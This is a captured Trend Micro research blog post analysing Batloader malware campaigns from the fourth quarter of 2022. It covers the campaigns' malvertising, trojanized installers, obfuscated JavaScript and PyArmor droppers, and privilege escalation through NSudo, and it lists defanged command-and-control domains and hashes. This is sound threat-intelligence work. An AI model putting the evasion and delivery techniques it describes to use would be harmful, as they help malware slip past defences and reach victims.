www.trendmicro.com
Open in
urlscan Pro
104.109.83.76
Public Scan
URL:
https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html
Submission: On March 14 via api from DE — Scanned from DE
Submission: On March 14 via api from DE — Scanned from DE
Form analysis 3 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
</tr>
</tbody>
</table>
</div>
</form><form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form-mobile">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
<td class="gsc-search-close collapsed" style="width:1%;" data-target="#search-mobile-wrapper" data-toggle="collapse">
<span class="icon-close"></span>
</td>
</tr>
</tbody>
</table>
</div>
</form>POST #
<form class="acsb-form" data-acsb-search="form" enctype="multipart/form-data" action="#" method="POST"> <input type="text" tabindex="0" name="acsb_search" autocomplete="off" placeholder="Unclear content? Search in dictionary..."
aria-label="Unclear content? Search in dictionary..."> <i class="acsbi-search"></i> <i class="acsbi-chevron_down"></i> </form>Text Content
Trend Micro Acquires SOC Technology Expert Anlyz
Learn more >
Use Website In a Screen-Reader Mode
Skip to Content
↵ENTER
Skip to Menu
↵ENTER
Skip to Footer
↵ENTER
dismiss
0 Alerts
undefined
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Find a Partner
* Home Office Online Store
* Renew Online
* Free Tools
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Log In
* Business Support Portal
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Free trials
* Cloud
* Detection and Response
* User Protection
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
Business
Solutions Solutions
Platform
Trend Micro One
By Challenge
Understand, Prioritize & Mitigate Risks
Secure Cloud-Native Apps
Hybrid cloud transformation
Securing your workforce infrastructure
Eliminate network blindspots
See more and respond faster
Threats Agilely to Extending your team resources
By Role
CISO/CIO
SOC Manager
Infrastructure Manager
Cloud Builder and Developer
Cloud Security Ops
By Industry
Healthcare
Manufacturing
Oil & Gas
Electric Utility
Federal
Automotive
5G Networks
Products Products
Cloud Security
Cloud Security Overview
Workload Security
Cloud Security Posture Management
Container Security
File Storage Security
Endpoint Security
Network Security
Open Source Security
Cloud Visibility
Network Security
Network Security Overview
Network Intrusion Prevention (IPS)
Breach Detection System (BDS)
Secure Service Edge (SSE)
OT & ICS Security
Endpoint & Email Security
Endpoint & Email Security Overview
Endpoint Protection
Email Security
Mobile Security
Security Operations
Security Operations Overview
Attack Surface Management
XDR (Extended Detection & Response)
Threat Intelligence
All Products & Trials
Our Unified Platform
Service Packages
Small & Midsize Business Security
Services Services
Our Services
Service Packages
Managed XDR
Support Services
Research Research
Research
About Our Research
Research, News and Perspectives
Research and Analysis
Blog
Security Reports
Security News
Zero Day Initiatives (ZDI)
Resources
CISO Resource Center
DevOps Resource Center
Cyber Risk Index/Assessment
Threat Encyclopedia
What Is?
Glossary of Terms
EXPLORE THE CYBER RISK INDEX (CRI)
Use the CRI to assess your organization’s preparedness against attacks, and get
a snapshot of cyber risk across organizations globally.
Calculate your risk
Partners Partners
Channel Partners
Channel Partner Overview
Managed Service Provider
Cloud Service Provider
Professional Services
Resellers
Marketplace
System Integrators
Alliance Partners
Alliance Overview
Technology Alliance Partners
Our Alliance Partners
Partner Tools
Partner Login
Education and Certification
Partner Successes
Distributors
Find a Partner
About About
Why Trend Micro
The Trend Micro Difference
Customer Success Stories
The Human Connections
Industry Accolades
Strategic Alliances
Company
Trust Center
History
Diversity, Equity & Inclusion
Corporate Social Responsibility
Leadership
Security Experts
Internet Safety and Cybersecurity Education
Legal
Resources
Newsroom
Events
Investors
Careers
Webinars
×
Folio (0)
0 Alerts
undefined
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Find a Partner
* Home Office Online Store
* Renew Online
* Free Tools
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Log In
* Business Support Portal
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Free trials
* Cloud
* Detection and Response
* User Protection
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
* No new notifications at this time.
* No new notifications at this time.
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
* Find a Partner
* Home Office Online Store
* Renew Online
* Free Tools
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Business Support Portal
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
* Cloud
* Detection and Response
* User Protection
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
undefined
Malware
Batloader Malware Abuses Legitimate Tools, Uses Obfuscated JavaScript Files in
Q4 2022 Attacks
Subscribe
Content added to Folio
Folio (0) close
Malware
BATLOADER MALWARE ABUSES LEGITIMATE TOOLS, USES OBFUSCATED JAVASCRIPT FILES IN
Q4 2022 ATTACKS
We discuss the Batloader malware campaigns we observed in the last quarter of
2022, including our analysis of Water Minyades-related events (This is the
intrusion set we track behind the creation of Batloader).
By: Junestherry Dela Cruz January 17, 2023 Read time: 10 min (2728 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
We discuss the Batloader malware campaigns we observed in the last quarter of
2022, including our analysis of Water Minyades-related events (This is the
intrusion set we track behind the creation of Batloader).
Batloader (detected by Trend Micro as Trojan.Win32.BATLOADER), is an initial
access malware family that is known for using malvertising techniques and using
script-based malware inside Microsoft Software Installation (MSI) packages
downloaded from legitimate-looking-yet-malicious websites. Earlier this year,
Mandiant researchers observed Batloader using search engine optimization (SEO)
poisoning techniques in its attacks.
Batloader is associated with an intrusion set that we have dubbed “Water
Minyades.” The actors behind Water Minyades are known for delivering other
malware during the last quarter of 2022, such as Qakbot, RaccoonStealer, and
Bumbleloader via social engineering techniques.
In this blog entry, we discuss notable Batloader campaigns that we’ve observed
in the last quarter of 2022, including the abuse of custom action scripts from
the Advanced Installer software and Windows Installer XML (WiX) toolset, the use
of obfuscated JavaScript files as a first-stage payload, and the use of PyArmor
tool to obfuscate Batloader Python scripts. We also shed light on noteworthy
Water Minyades-related events and give a detailed look at Batloader’s technical
details.
BATLOADER’S CAPABILITIES
The table below summarizes the capabilities of Batloader:
Capability Description Anti-sandbox Batloader is usually inflated to a very
large size by being bundled to a legitimate installer file. This can prevent
sandboxes with file size limits from properly detonating and observing the
behavior of the file. Fingerprints host Batloader fingerprints the host to
determine if it is a legitimate victim. It checks for environment artifacts such
as the user, computer name, and if it is domain-joined. Communicates with C&C
Batloader is a modular malware that communicates with its C&C server and has
been observed to drop malware according to the specifications of the victim host
it has infected. If the victim host belongs to an enterprise environment, it is
more likely to drop remote management tool Atera and Cobalt Strike beacon, which
would then lead to ransomware deployment. Stops security software services
Batloader executes open-sourced scripts that attempt to stop services related to
security software, such as Windows Defender. Escalates privileges Batloader
abuses legitimate tools like NirCmd.exe and Nsudo.exe to escalate privileges.
Evades antivirus (AV) solutions Batloader uses different techniques to attempt
evading antivirus solutions, such as hyperinflating MSI file sizes for antivirus
engines that have file size limits, using noticeably short modular scripts that
can be hard to structurally detect, acquiring legitimate digital signatures for
the MSI files, obfuscating scripts connecting to the Batloader command and
control (C&C) servers, and abusing legitimate file sharing services to host
malware payloads. Installs other components Batloader uses a modular approach
wherein the first-stage payload of the campaign is usually an MSI file bundled
with custom action scripts. The other components of the campaign, including the
legitimate tools it will download to escalate its privileges and download other
malware, will be downloaded by these scripts. Installs additional malware
Batloader has been observed to drop several malware payloads, such as Ursnif,
Vidar, Bumbleloader, RedLine Stealer, ZLoader, Cobalt Strike, and SmokeLoader.
It can also drop legitimate remote management tools, such as Syncro and Atera.
We have also seen Batloader being a key enabler for Royal ransomware, the
second-most prevalent ransomware family we have been observing recently.
Table 1. Batloader's capabilities
EXAMINING THE WATER MINYADES INTRUSION SET
Water Minyades is known for heavily relying on defense evasion techniques, one
of which is deploying payloads with very large file sizes to evade sandbox
analysis and antivirus engines’ file size limits. Water Minyades also abuses
legitimate tools, such as system management tool NSudo and email and file
encryption tool Gpg4win, to elevate privileges and decrypt malicious payloads.
This intrusion set also abuses MSI files’ legitimate digital signatures,
exploits vulnerabilities related to Windows’ PE Authenticode signatures to
execute malicious scripts that have been appended to signed DLLs (dynamic-link
libraries) and uses scripts that can be easily modified to evade scanning
engines that rely on structural signature detection techniques.
Using Trend Micro™ Smart Protection Network™ (SPN) feedback data, we determined
that Batloader attacks are mostly deployed in the United States, Canada,
Germany, Japan, and the United Kingdom.
Country Percentage of Attacks United States 61 Canada 8 Germany 8 Japan 4
United Kingdom 3 Australia 2 Brazil 2 Netherlands 2 Poland 1 Singapore 1 Others
8
Table 2. Distribution of Batloader attacks in Q4 2022
After tracking the activities related to Water Minyades and back tracking since
early 2020, we were able to determine several noteworthy events in this
timeline:
Period Water Minyades attack details H2 2020 An open-source intelligence
report indicates that this was when the intrusion set became active. During this
time, the group’s most dropped payload was the Smokeloader malware, and it also
heavily used exploit kits such as Rig and Fallout. Oct. 2020 The group behind
the intrusion set stopped using exploit kits in favor of social engineering
schemes, which meant that targets were no longer limited to Internet Explorer
users. They posted malicious advertisements on porn websites to lure victims
into downloading a fake Java MSI, which then led to the deployment of Zloader
payloads. Feb. 2022 The group behind Water Minyades distributed Batloader using
SEO poisoning techniques to trick victims into downloading legitimate software
and applications that were trojanized with malware script. During this time,
Batloader dropped Zloader and legitimate remote-management tool Atera to
enterprise victim machines. Batloader was also observed using the PE (portable
executable) polyglotting technique, which is the process of executing signed DLL
files with appended malicious scripts. Sep. 2022 Initial Batloader infections
were observed to have led to Cobalt Strike deployments and Royal ransomware
infections. Oct. 2022 Water Minyades actors abused Google Ads and the legitimate
Keitaro Traffic Direction System (TDS) to redirect victims into downloading
Batloader malware. Dec. 2022 Water Minyades actors used JavaScript instead of
MSI files as a first-stage payload. The group eventually obfuscated the
downloader of the JavaScript files.
Table 3. Water Minyades’ noteworthy events from 2020 to 2022
A TECHNICAL ANALYSIS OF BATLOADER
Batloader usually arrives via malicious websites that impersonate legitimate
software or applications. Victims can be redirected to these websites via
malvertising techniques and fake comments on forums containing links that lead
to Batloader distribution websites.
Based on our investigation, we determined that Batloader impersonates a slew of
legitimate software and application websites in its campaign:
* Adobe
* AnyDesk
* Audacity
* Blender
* CCleaner
* FileZilla
* Fortinet
* Foxit
* GetNotes
* Google Editor
* Grammarly
* Java
* KMSAuto
* LogmeIn
* Luminar
* Minersoft
* Putty
* Schwab
* Slack
* TeamViewer
* TradingView
* uTorrent
* WinRAR
* Zoho
* Zoom
Figure 1. Examples of malicious websites that distribute Batloader
When victims select the “Install” or “Download” option, the Batloader package
will be downloaded to the system via a .ZIP file.
Figure 2. The Batloader package
Figure 3. Typical Batloader kill chain
The stages below are typical Water Minyades techniques, tactics, and procedures
(TTPs) but may vary slightly over time.
Stage Stage No. Description Arrival 1 Water Minyades actors create malicious
advertisements that abuse legitimate services such as Google Ads and Keitaro
TDS. These malicious advertisements lead victims to malicious websites that aim
to resemble the legitimate websites of popular software and applications.
Infection 2 Victims are lured into installing a malicious file from the fake
website. Based on recent Water Minyades activities, this can take the form of an
MSI, VHD (Virtual Hard Disk), VHDX (Virtual Hard Disk v2), or a JavaScript file.
3 Earlier campaigns that used MSI files were observed to drop PE polyglot
binaries containing malicious appended scripts. These scripts can be executed by
MSHTA.exe due to a vulnerability in the PE Authenticode verification process.
The MSI and VHD files usually contain a custom action script that is designed to
connect to Batloader’s C&C server to download the next-stage payload. 4 Water
Minyades’ C&C server will decide which payload to drop. Post-infection
5
Batloader can install different malware families, such as:
*
* Bumble Loader
* Cobalt Strike
* Qakbot
* Raccoon Stealer
* RedLine Stealer
* Smoke Loader
* System BC
* Ursnif (Bot)
* Vidar (Stealer)
* ZLoader
Based on our observations, these malware families’ payloads are typically
hyperinflated in size and are encrypted. Batloader can also install the
following legitimate applications to aid with other stages of the kill chain,
such as privilege escalation and defense evasion:
* Nsudo – Is abused to run processes with elevated privileges
* Gpg4win – Is abused to decrypt next-stage payloads downloaded by Batloader.
* NirCmd – Is a command-line utility tool
* PowerShell – Is abused to run malicious PowerShell scripts
* MsiExec.exe – Is abused to run MSI files with malicious custom action scripts
* Mshta.exe – Is abused to execute malicious code appended to PE files
Batloader also abuses legitimate remote admin tools, such as Syncro and Atera,
to facilitate ransomware deployment. 6 Second-stage malware like Ursnif, Cobalt
Strike Beacon, and Bumblebee usually connect to their own C&C server to execute
follow-on activities. 7 Follow-on activities can include the deployment of
ransomware families such as Royal.
Table 4. Water Minyades attack stages
BATLOADER’S NOTABLE Q4 CAMPAIGNS
In this section, we identify the different campaigns’ techniques observed. We
see from the campaigns above that although the Batloader malware is
predominantly script-based, this intrusion set continuously finds ways to evade
detection and improve its antianalysis techniques by utilizing legitimate tools
to hide and obfuscate their scripts.
Abuse of custom action scripts of the Advanced Installer software
We have observed that some Batloader MSI packages were used to abuse a
legitimate installer file via a custom action PowerShell script. Potentially,
this was carried out by abusing the Advanced Installer software 30-day free
trial application form.
Figure 4. Advanced Installer’s 30-day free trial form abused by Water Minyades
actors
Figure 5. An example of an MSI file with a custom action PowerShell script
viewed using the Pe Studio tool
In Figure 6, we can see that the Batloader script was launched via the
“PowerShellScriptLauncher.dll” file that was created using the Advanced
Installer software.
Figure 6. Batloader script launched via “PowerShellScriptLauncher.dll”
Figure 7. Batloader kill chain using compromised MSI package
From our tracking, this technique was used in a number of campaigns between
September 2022 and December 2022.
Figure 8. Batloader C&C server activities abusing Advanced Installer software.
Data taken from Trend Micro SPN.
Abuse of Windows Installer XML Toolset
Another tool that was recently abused by Water Minyades actors was the WiX
toolset.
Figure 9. An example of an MSI file created using the WiX toolset viewed using
the PE Studio tool
Using this toolset, malicious actors can insert a custom action script and
identify when it will be executed. In Figure 10, we can see that the custom
action "checkforupdate.bat" will be executed, which will also drop and execute
additional malicious scripts inside the “update.zip” file.
Figure 10. A custom action created using the WiX toolset
Figure 11. Snippet of code from checkforupdate.bat’s follow-on activities
We also observed a significant number of campaigns using this technique during
the month of November 2022.
Figure 12. Batloader C&C server activities abusing Windows Installer XML
Toolset. Data taken from Trend Micro SPN.
Use of JavaScript files instead of MSI files in campaigns
Starting November 27, 2022, we observed that Water Minyades actors switched to
using JavaScript files instead of MSI files as the initial Batloader payload.
This technique uses small-sized JavaScript files that have straightforward
commands, ones that are also used for non-malicious purposes. This is in direct
contrast to the technique used with MSI files, wherein MSI file sizes are
hyperinflated to evade scanning engines with file size limitations.
From a detection point of view, this can also pose as a challenge because the
only malicious parts of the file are the C&C URLs themselves, since a
structure-based detection algorithm can also detect non-malicious JavaScript
files.
Figure 13. Contents of a Batloader JavaScript file named “InstallerV61.js”
This highlights the need for a multilayered security solution, one that can
successfully detect malicious artifacts related to Batloader campaigns.
After a few days of analyzing this Batloader campaign, we have observed that the
malicious actors behind it have obfuscated the JavaScript files as an additional
detection evasion measure.
Figure 14. An obfuscated Batloader JavaScript file
Figure 15. A typical execution chain for the JavaScript Batloader campaign
Based on the distribution domains used in this campaign, we believe that this
campaign was launched during Black Friday:
* logmeinofferblackfriday[.]com
* anydeskofferblackfriday[.]com
* zoomofferblackfriday[.]com
* slackcloudservices[.]com
* anydeskofferblackfriday[.]com
According to our telemetry, a significant number of campaigns used this
technique between the end of November to the first week of December 2022.
Figure 16. Batloader C&C server activities abusing JavaScript downloaders. Data
taken from Trend Micro SPN.
Use of PyArmor tool to obfuscate Batloader Python script
After the JavaScript campaigns of Batloader, we observed since the second week
of December 2022 that the group abused the Advanced Installer Software again.
This time the malicious file that it executed in the end is a Python script
protected with PyArmor.
We found a sample MSI file (SHA256:
2e65cfebde138e4dd816d3e8b8105e796c4eb38cfa27015938c0445ee5be8331), which is a
trojanized Chat Mapper installer masquerading as an Anydesk.msi installer. This
installer was created using Advanced Installer application, and one of its
customized actions is to execute a file called “viewer.exe” with the command
line “#InstallPython.bat”.
Figure 17. Custom Action script of the latest Batloader campaign observed in Q4
2022
The file InstallPython.bat will install Python 3.9.9, copy and extract the
openssl.zip archive, and run the PyArmor encrypted Python script named main4.py.
Figure 18. InstallPython.bat
PyArmor is a free-with-restrictions command line tool that can be used to
obfuscate Python scripts. The obfuscated Python file in this case is named
main4.py:
Figure 19. Batloader PyArmor-protected Python script
Deobfuscating this script using the techniques identified by PyArmor Unpacker,
we see that this script connects to the Batloader C&C
updateclientssoftware[.]com. We’ve observed this Batloader C&C server active
from the second week of December until the second week of January 2023. We are
continuously monitoring this campaign for any additional activities.
Figure 20. Connecting to the Batloader C&C
Batloader’s C&C Activities in Q4 2022
We started observing an increase in Water Minyades activity in September 2022,
which was also the time when we started seeing Batloader deploying Royal
ransomware to its victims. The number of attacks peaked from November until the
first week of December 2022.
Figure 21. Batloader requests to C&C domain from October to December 2022. Data
taken from Trend Micro SPN.
Figure 22. Most requested Batloader C&C domains from October to December 2022.
Data taken from Trend Micro SPN.
The C&C domain with the most number of requests for Q4 2022 is
“installationupgrade6[.]com.” Interestingly, this was the first C&C domain used
in the Batloader campaign via JavaScript droppers and Black Friday Sale-related
malicious distribution websites.
This could mean that victims are more likely to fall for malvertising campaigns
that promote sales or discounts. This highlights the massive impact social
engineering lures have on the success of these malicious campaigns.
CONCLUSION
Based on our investigation, Batloader is a highly evasive and evolutionary
malware family capable of deploying different types of malware, including
loaders, bots, and ransomware. Batloader tricks victims by using different
malvertising and social engineering techniques to distribute malicious payloads.
Batloader is a prime example of a modern malware and a modular threat, and
protecting systems against it requires not just one defensive strategy, but a
robust and multilayered solution that provides shared visibility from a central
place. Trend Micro Vision One™ is a technology that can provide powerful XDR
capabilities that collect and automatically correlate data across multiple
security layers — from email and endpoints to servers, cloud workloads, and
networks. Trend Vision One can prevent attacks via automated protection, while
also ensuring that no significant incidents go unnoticed.
INDICATORS OF COMPROMISE (IOCS)
URLs
105105105015[.]com Batloader C&C server
24xpixeladvertising[.]com Batloader C&C server
clodtechnology[.]com Batloader C&C server
cloudupdatesss[.]com Batloader C&C server
externalchecksso[.]com Batloader C&C server
grammarlycheck2[.]com Batloader C&C server
installationsoftware1[.]com Batloader C&C server
installationupgrade6[.]com Batloader C&C server
internalcheckssso[.]com Batloader C&C server
t1pixel[.]com Batloader C&C server
updatea1[.]com Batloader C&C server
updateclientssoftware[.]com Batloader C&C server
updatecloudservice1[.]com Batloader C&C server
SHA256 Description Detection
23373654d02cb7eace932609826cca4f82fcac67ca44b9328baba385acc00c67 - Component of
2e65cfebde138e4dd816d3e8b8105e796c4eb38cfa27015938c0445ee5be8331 Batloader File
Trojan.BAT.BATLOADER.A
f8f3f22425ea72fafba5453c70c299367bd144c95e61b348d1e6dda0c469e219 - Component of
2e65cfebde138e4dd816d3e8b8105e796c4eb38cfa27015938c0445ee5be8331 Batloader File
Trojan.Python.BATLOADER.A
61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc Batloader File
Trojan.JS.BATLOADER.SMYXCLAZ
91730741d72584f96ccba99ac9387e09b17be6d64728673871858ea917543c1e Batloader File
Trojan.JS.BATLOADER.SMYXCLAZ
aef18b7ab1710aaeb0d060127750ba9d17413035309ec74213d538fb1b1bdf79 Batloader File
Trojan.JS.BATLOADER.SMYXCLAZ
e7735cb541e7afd50759eae860b7d1a43d627fbf5cd96d016241084e91659817 Batloader File
Trojan.JS.BATLOADER.SMYXCLAZ
23a5981d086242349f6e3476eff11ea3244cebef3d65c76c7bc74470c1ec4b49 Batloader File
Trojan.Win32.BATLOADER.SMYXCK3Z
3707ad9d9ea318757883ede9691e5c4e8d778c839a056f8b4a94ed47a76da2c8 Batloader File
Trojan.Win32.BATLOADER.SMYXCK3Z
86f6af51d30159f4d2e00ed733a88dc05cc5dd846b1b2d1ba30582f6e33ac998 Batloader File
Trojan.Win32.BATLOADER.SMYXCK3Z
b28047cda1c688c844f676e94770c08cf570f4d65fa4c5e4454ae449c2439e3f Batloader File
Trojan.Win32.BATLOADER.SMYXCK3Z
e1dcc098a6585dbbf4df64f09f8e8508e218485e1958fe6fe04b91547e109a83 Batloader File
Trojan.Win32.BATLOADER.SMYXCK3Z
e528cb5e7a2d04269d955ce771b7326bae929355807039f49106126b1a5ff227 Batloader File
Trojan.Win32.FRS.VSNW1DK22/Trojan.PS1.BATLOADER.SMYXCK3Z
fcbfbc2ae4ed3e51631ecb3184004d96f0a6fd5e9de55400dedfa6b5cafc7c41 Batloader File
Trojan.Win32.FRS.VSNW1DK22/Trojan.PS1.BATLOADER.SMYXCK3Z
Tags
Malware | Endpoints | Research | Articles, News, Reports
AUTHORS
* Junestherry Dela Cruz
Threats Analyst
Contact Us
Subscribe
RELATED ARTICLES
* Emotet Returns, Now Adopts Binary Padding for Evasion
* S4x23 Review Part 2: Evolving Energy Cybersecurity
* Bruised but Not Broken: The Resurgence of the Emotet Botnet Malware
See all articles
* Contact Sales
* Locations
* Careers
* Newsroom
* Trust Center
* Privacy
* Accessibility
* Support
* Site map
* linkedin
* twitter
* facebook
* youtube
* instagram
* rss
Copyright © 2023 Trend Micro Incorporated. All rights reserved.
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
English
Accessibility Adjustments
Reset Settings Statement Hide Interface
Choose the right accessibility profile for you
OFF ON
Seizure Safe Profile Clear flashes & reduces color
This profile enables epileptic and seizure prone users to browse safely by
eliminating the risk of seizures that result from flashing or blinking
animations and risky color combinations.
OFF ON
Vision Impaired Profile Enhances website's visuals
This profile adjusts the website, so that it is accessible to the majority of
visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract,
Glaucoma, and others.
OFF ON
ADHD Friendly Profile More focus & fewer distractions
This profile significantly reduces distractions, to help people with ADHD and
Neurodevelopmental disorders browse, read, and focus on the essential elements
of the website more easily.
OFF ON
Cognitive Disability Profile Assists with reading & focusing
This profile provides various assistive features to help users with cognitive
disabilities such as Autism, Dyslexia, CVA, and others, to focus on the
essential elements of the website more easily.
OFF ON
Keyboard Navigation (Motor) Use website with the keyboard
This profile enables motor-impaired persons to operate the website using the
keyboard Tab, Shift+Tab, and the Enter keys. Users can also use shortcuts such
as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics)
to jump to specific elements.
Note: This profile prompts automatically for keyboard users.
OFF ON
Blind Users (Screen Reader) Optimize website for screen-readers
This profile adjusts the website to be compatible with screen-readers such as
JAWS, NVDA, VoiceOver, and TalkBack. A screen-reader is software that is
installed on the blind user’s computer and smartphone, and websites should
ensure compatibility with it.
Note: This profile prompts automatically to screen-readers.
Content Adjustments
Content Scaling
Default
Readable Font
Highlight Titles
Highlight Links
Text Magnifier
Adjust Font Sizing
Default
Align Center
Adjust Line Height
Default
Align Left
Adjust Letter Spacing
Default
Align Right
Color Adjustments
Dark Contrast
Light Contrast
High Contrast
High Saturation
Adjust Text Colors
Cancel
Monochrome
Adjust Title Colors
Cancel
Low Saturation
Adjust Background Colors
Cancel
Orientation Adjustments
Mute Sounds
Hide Images
Read Mode
Reading Guide
Useful Links
Select an option Home Header Footer Main Content
Stop Animations
Reading Mask
Highlight Hover
Highlight Focus
Big Black Cursor
Big White Cursor
HIDDEN_ADJUSTMENTS
Keyboard Navigation
Accessible Mode
Screen Reader Adjustments
Read Mode
Web Accessibility By
Learn More
Choose the Interface Language
English
Español
Deutsch
Português
Français
Italiano
עברית
繁體中文
Pусский
عربى
عربى
Nederlands
繁體中文
日本語
Polski
Türk
Accessibility StatementCompliance status
We firmly believe that the internet should be available and accessible to anyone
and are committed to providing a website that is accessible to the broadest
possible audience, regardless of ability.
To fulfill this, we aim to adhere as strictly as possible to the World Wide Web
Consortium’s (W3C) Web Content Accessibility Guidelines 2.1 (WCAG 2.1) at the AA
level. These guidelines explain how to make web content accessible to people
with a wide array of disabilities. Complying with those guidelines helps us
ensure that the website is accessible to blind people, people with motor
impairments, visual impairment, cognitive disabilities, and more.
This website utilizes various technologies that are meant to make it as
accessible as possible at all times. We utilize an accessibility interface that
allows persons with specific disabilities to adjust the website’s UI (user
interface) and design it to their personal needs.
Additionally, the website utilizes an AI-based application that runs in the
background and optimizes its accessibility level constantly. This application
remediates the website’s HTML, adapts its functionality and behavior for
screen-readers used by blind users, and for keyboard functions used by
individuals with motor impairments.
If you wish to contact the website’s owner please use the website's form
Screen-reader and keyboard navigation
Our website implements the ARIA attributes (Accessible Rich Internet
Applications) technique, alongside various behavioral changes, to ensure blind
users visiting with screen-readers can read, comprehend, and enjoy the website’s
functions. As soon as a user with a screen-reader enters your site, they
immediately receive a prompt to enter the Screen-Reader Profile so they can
browse and operate your site effectively. Here’s how our website covers some of
the most important screen-reader requirements:
1. Screen-reader optimization: we run a process that learns the website’s
components from top to bottom, to ensure ongoing compliance even when
updating the website. In this process, we provide screen-readers with
meaningful data using the ARIA set of attributes. For example, we provide
accurate form labels; descriptions for actionable icons (social media icons,
search icons, cart icons, etc.); validation guidance for form inputs;
element roles such as buttons, menus, modal dialogues (popups), and others.
Additionally, the background process scans all of the website’s images. It
provides an accurate and meaningful image-object-recognition-based
description as an ALT (alternate text) tag for images that are not
described. It will also extract texts embedded within the image using an OCR
(optical character recognition) technology. To turn on screen-reader
adjustments at any time, users need only to press the Alt+1 keyboard
combination. Screen-reader users also get automatic announcements to turn
the Screen-reader mode on as soon as they enter the website.
These adjustments are compatible with popular screen readers such as JAWS,
NVDA, VoiceOver, and TalkBack.
2. Keyboard navigation optimization: The background process also adjusts the
website’s HTML and adds various behaviors using JavaScript code to make the
website operable by the keyboard. This includes the ability to navigate the
website using the Tab and Shift+Tab keys, operate dropdowns with the arrow
